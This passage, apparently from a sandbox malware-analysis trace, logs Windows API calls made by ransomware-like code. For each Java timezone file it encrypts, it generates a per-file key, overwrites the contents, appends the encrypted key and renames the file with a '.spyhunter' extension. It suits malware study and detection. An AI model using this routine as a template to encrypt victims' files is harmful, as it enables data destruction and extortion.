pdwDataLen=0x270e648*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x270e648*=0x30) returned 1 [0169.216] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Riyadh87" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\riyadh87"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0169.292] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Riyadh87") returned 57 [0169.292] StrStrW (lpFirst="Riyadh87", lpSrch=".txt") returned 0x0 [0169.292] GetProcessHeap () returned 0x2c0000 [0169.292] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0169.292] ReadFile (in: hFile=0x178, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270e60c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x270e60c*=0x12d5, lpOverlapped=0x0) returned 1 [0169.319] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffed2b, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0169.319] WriteFile (in: hFile=0x178, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x12d5, lpNumberOfBytesWritten=0x270e60c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x270e60c*=0x12d5, lpOverlapped=0x0) returned 1 [0169.320] GetProcessHeap () returned 0x2c0000 [0169.320] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0169.320] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0169.320] WriteFile (in: hFile=0x178, lpBuffer=0x270e64c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270e60c, lpOverlapped=0x0 | out: lpBuffer=0x270e64c*, lpNumberOfBytesWritten=0x270e60c*=0x4, lpOverlapped=0x0) returned 1 [0169.320] WriteFile (in: hFile=0x178, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270e60c, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x270e60c*=0x30, lpOverlapped=0x0) returned 1 [0169.320] CloseHandle (hObject=0x178) returned 1 [0169.320] GetProcessHeap () returned 0x2c0000 [0169.320] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0169.320] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Riyadh87.spyhunter") returned 67 [0169.320] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Riyadh87" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\riyadh87"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Riyadh87.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\riyadh87.spyhunter")) returned 1 [0169.321] GetProcessHeap () returned 0x2c0000 [0169.321] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0169.321] GetProcessHeap () returned 0x2c0000 [0169.321] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0169.321] GetProcessHeap () returned 0x2c0000 [0169.321] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ebcf80 | out: hHeap=0x2c0000) returned 1 [0169.321] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e648 | out: pbBuffer=0x270e648) returned 1 [0169.321] GetProcessHeap () returned 0x2c0000 [0169.321] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0169.321] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x270e640*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x270e640*=0x30) returned 1 [0169.321] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Novosibirsk" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\novosibirsk"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0169.322] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Novosibirsk") returned 60 [0169.322] StrStrW (lpFirst="Novosibirsk", lpSrch=".txt") returned 0x0 [0169.322] GetProcessHeap () returned 0x2c0000 [0169.322] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0169.322] ReadFile (in: hFile=0x178, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270e604, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x270e604*=0x24d, lpOverlapped=0x0) returned 1 [0169.323] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xfffffdb3, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0169.323] WriteFile (in: hFile=0x178, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x24d, lpNumberOfBytesWritten=0x270e604, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x270e604*=0x24d, lpOverlapped=0x0) returned 1 [0169.323] GetProcessHeap () returned 0x2c0000 [0169.323] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0169.323] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0169.323] WriteFile (in: hFile=0x178, lpBuffer=0x270e644*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270e604, lpOverlapped=0x0 | out: lpBuffer=0x270e644*, lpNumberOfBytesWritten=0x270e604*=0x4, lpOverlapped=0x0) returned 1 [0169.323] WriteFile (in: hFile=0x178, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270e604, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x270e604*=0x30, lpOverlapped=0x0) returned 1 [0169.323] CloseHandle (hObject=0x178) returned 1 [0169.323] GetProcessHeap () returned 0x2c0000 [0169.323] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0169.323] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Novosibirsk.spyhunter") returned 70 [0169.323] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Novosibirsk" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\novosibirsk"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Novosibirsk.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\novosibirsk.spyhunter")) returned 1 [0169.324] GetProcessHeap () returned 0x2c0000 [0169.324] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0169.324] GetProcessHeap () returned 0x2c0000 [0169.324] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0169.324] GetProcessHeap () returned 0x2c0000 [0169.324] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ebafe8 | out: hHeap=0x2c0000) returned 1 [0169.324] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e648 | out: pbBuffer=0x270e648) returned 1 [0169.324] GetProcessHeap () returned 0x2c0000 [0169.324] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0169.324] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x270e640*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x270e640*=0x30) returned 1 [0169.324] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Novokuznetsk" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\novokuznetsk"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0169.325] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Novokuznetsk") returned 61 [0169.325] StrStrW (lpFirst="Novokuznetsk", lpSrch=".txt") returned 0x0 [0169.325] GetProcessHeap () returned 0x2c0000 [0169.325] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0169.325] ReadFile (in: hFile=0x178, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270e604, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x270e604*=0x245, lpOverlapped=0x0) returned 1 [0169.326] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xfffffdbb, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0169.326] WriteFile (in: hFile=0x178, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x245, lpNumberOfBytesWritten=0x270e604, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x270e604*=0x245, lpOverlapped=0x0) returned 1 [0169.326] GetProcessHeap () returned 0x2c0000 [0169.326] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0169.326] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0169.326] WriteFile (in: hFile=0x178, lpBuffer=0x270e644*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270e604, lpOverlapped=0x0 | out: lpBuffer=0x270e644*, lpNumberOfBytesWritten=0x270e604*=0x4, lpOverlapped=0x0) returned 1 [0169.326] WriteFile (in: hFile=0x178, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270e604, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x270e604*=0x30, lpOverlapped=0x0) returned 1 [0169.327] CloseHandle (hObject=0x178) returned 1 [0169.327] GetProcessHeap () returned 0x2c0000 [0169.327] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0169.327] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Novokuznetsk.spyhunter") returned 71 [0169.327] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Novokuznetsk" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\novokuznetsk"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Novokuznetsk.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\novokuznetsk.spyhunter")) returned 1 [0169.327] GetProcessHeap () returned 0x2c0000 [0169.328] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0169.328] GetProcessHeap () returned 0x2c0000 [0169.328] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0169.328] GetProcessHeap () returned 0x2c0000 [0169.328] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ebaf20 | out: hHeap=0x2c0000) returned 1 [0169.328] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e640 | out: pbBuffer=0x270e640) returned 1 [0169.328] GetProcessHeap () returned 0x2c0000 [0169.328] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0169.328] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x270e638*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x270e638*=0x30) returned 1 [0169.328] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Nicosia" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\nicosia"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0169.328] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Nicosia") returned 56 [0169.328] StrStrW (lpFirst="Nicosia", lpSrch=".txt") returned 0x0 [0169.328] GetProcessHeap () returned 0x2c0000 [0169.328] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0169.328] ReadFile (in: hFile=0x178, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270e5fc, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x270e5fc*=0x45c, lpOverlapped=0x0) returned 1 [0169.330] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xfffffba4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0169.330] WriteFile (in: hFile=0x178, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x45c, lpNumberOfBytesWritten=0x270e5fc, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x270e5fc*=0x45c, lpOverlapped=0x0) returned 1 [0169.330] GetProcessHeap () returned 0x2c0000 [0169.330] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0169.330] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0169.330] WriteFile (in: hFile=0x178, lpBuffer=0x270e63c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270e5fc, lpOverlapped=0x0 | out: lpBuffer=0x270e63c*, lpNumberOfBytesWritten=0x270e5fc*=0x4, lpOverlapped=0x0) returned 1 [0169.330] WriteFile (in: hFile=0x178, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270e5fc, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x270e5fc*=0x30, lpOverlapped=0x0) returned 1 [0169.330] CloseHandle (hObject=0x178) returned 1 [0169.330] GetProcessHeap () returned 0x2c0000 [0169.330] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0169.330] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Nicosia.spyhunter") returned 66 [0169.330] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Nicosia" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\nicosia"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Nicosia.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\nicosia.spyhunter")) returned 1 [0169.331] GetProcessHeap () returned 0x2c0000 [0169.331] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0169.331] GetProcessHeap () returned 0x2c0000 [0169.331] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0169.331] GetProcessHeap () returned 0x2c0000 [0169.331] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ebcb00 | out: hHeap=0x2c0000) returned 1 [0169.331] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e640 | out: pbBuffer=0x270e640) returned 1 [0169.331] GetProcessHeap () returned 0x2c0000 [0169.331] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0169.331] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x270e638*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x270e638*=0x30) returned 1 [0169.331] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Muscat" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\muscat"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0169.332] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Muscat") returned 55 [0169.332] StrStrW (lpFirst="Muscat", lpSrch=".txt") returned 0x0 [0169.332] GetProcessHeap () returned 0x2c0000 [0169.332] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0169.332] ReadFile (in: hFile=0x178, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270e5fc, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x270e5fc*=0x41, lpOverlapped=0x0) returned 1 [0169.333] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffffbf, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0169.333] WriteFile (in: hFile=0x178, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x41, lpNumberOfBytesWritten=0x270e5fc, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x270e5fc*=0x41, lpOverlapped=0x0) returned 1 [0169.333] GetProcessHeap () returned 0x2c0000 [0169.333] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0169.333] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0169.333] WriteFile (in: hFile=0x178, lpBuffer=0x270e63c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270e5fc, lpOverlapped=0x0 | out: lpBuffer=0x270e63c*, lpNumberOfBytesWritten=0x270e5fc*=0x4, lpOverlapped=0x0) returned 1 [0169.333] WriteFile (in: hFile=0x178, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270e5fc, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x270e5fc*=0x30, lpOverlapped=0x0) returned 1 [0169.334] CloseHandle (hObject=0x178) returned 1 [0169.334] GetProcessHeap () returned 0x2c0000 [0169.334] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0169.334] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Muscat.spyhunter") returned 65 [0169.334] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Muscat" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\muscat"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Muscat.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\muscat.spyhunter")) returned 1 [0169.334] GetProcessHeap () returned 0x2c0000 [0169.334] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0169.334] GetProcessHeap () returned 0x2c0000 [0169.334] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0169.334] GetProcessHeap () returned 0x2c0000 [0169.334] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f27650 | out: hHeap=0x2c0000) returned 1 [0169.335] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e638 | out: pbBuffer=0x270e638) returned 1 [0169.335] GetProcessHeap () returned 0x2c0000 [0169.335] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0169.335] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x270e630*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x270e630*=0x30) returned 1 [0169.335] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Manila" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\manila"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0169.335] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Manila") returned 55 [0169.335] StrStrW (lpFirst="Manila", lpSrch=".txt") returned 0x0 [0169.335] GetProcessHeap () returned 0x2c0000 [0169.335] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0169.335] ReadFile (in: hFile=0x178, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270e5f4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x270e5f4*=0x7d, lpOverlapped=0x0) returned 1 [0169.336] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffff83, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0169.336] WriteFile (in: hFile=0x178, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x7d, lpNumberOfBytesWritten=0x270e5f4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x270e5f4*=0x7d, lpOverlapped=0x0) returned 1 [0169.336] GetProcessHeap () returned 0x2c0000 [0169.336] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0169.336] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0169.336] WriteFile (in: hFile=0x178, lpBuffer=0x270e634*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270e5f4, lpOverlapped=0x0 | out: lpBuffer=0x270e634*, lpNumberOfBytesWritten=0x270e5f4*=0x4, lpOverlapped=0x0) returned 1 [0169.337] WriteFile (in: hFile=0x178, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270e5f4, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x270e5f4*=0x30, lpOverlapped=0x0) returned 1 [0169.337] CloseHandle (hObject=0x178) returned 1 [0169.337] GetProcessHeap () returned 0x2c0000 [0169.337] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0169.337] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Manila.spyhunter") returned 65 [0169.337] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Manila" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\manila"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Manila.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\manila.spyhunter")) returned 1 [0169.337] GetProcessHeap () returned 0x2c0000 [0169.337] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0169.338] GetProcessHeap () returned 0x2c0000 [0169.338] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0169.338] GetProcessHeap () returned 0x2c0000 [0169.338] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f27598 | out: hHeap=0x2c0000) returned 1 [0169.338] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e638 | out: pbBuffer=0x270e638) returned 1 [0169.338] GetProcessHeap () returned 0x2c0000 [0169.338] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0169.338] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x270e630*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x270e630*=0x30) returned 1 [0169.338] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Makassar" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\makassar"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0169.339] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Makassar") returned 57 [0169.339] StrStrW (lpFirst="Makassar", lpSrch=".txt") returned 0x0 [0169.339] GetProcessHeap () returned 0x2c0000 [0169.339] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0169.339] ReadFile (in: hFile=0x178, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270e5f4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x270e5f4*=0x55, lpOverlapped=0x0) returned 1 [0169.340] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffffab, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0169.340] WriteFile (in: hFile=0x178, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x55, lpNumberOfBytesWritten=0x270e5f4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x270e5f4*=0x55, lpOverlapped=0x0) returned 1 [0169.340] GetProcessHeap () returned 0x2c0000 [0169.340] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0169.340] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0169.340] WriteFile (in: hFile=0x178, lpBuffer=0x270e634*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270e5f4, lpOverlapped=0x0 | out: lpBuffer=0x270e634*, lpNumberOfBytesWritten=0x270e5f4*=0x4, 